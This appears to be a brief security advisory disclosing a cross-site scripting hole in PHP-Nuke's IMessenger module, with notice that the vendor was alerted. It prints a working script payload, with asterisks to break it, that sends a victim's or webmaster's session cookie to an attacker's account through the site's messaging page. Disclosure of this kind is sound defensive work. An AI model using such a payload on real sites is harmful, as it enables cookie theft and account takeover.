Serious bug in IMessenger ( php-nuke )

[frog frog <leseulfrog () hotmail com>]

IMessenger accept javascript.

We can so directly execute javascript on the 
computer  of a member or the webmaster.

For example, if I send the script

<*s*cript>window.location.href='http://www.SERVER.
com/im.php?username_to=h4x0r&subject='+ 
document.cookie 
+'&message=message&action=send' ;</s*cript>

(without the '*'), to the webmaster, his cookie will be 
sent to the user h4x0r.

PHPNuke was alerted.

frog-m@n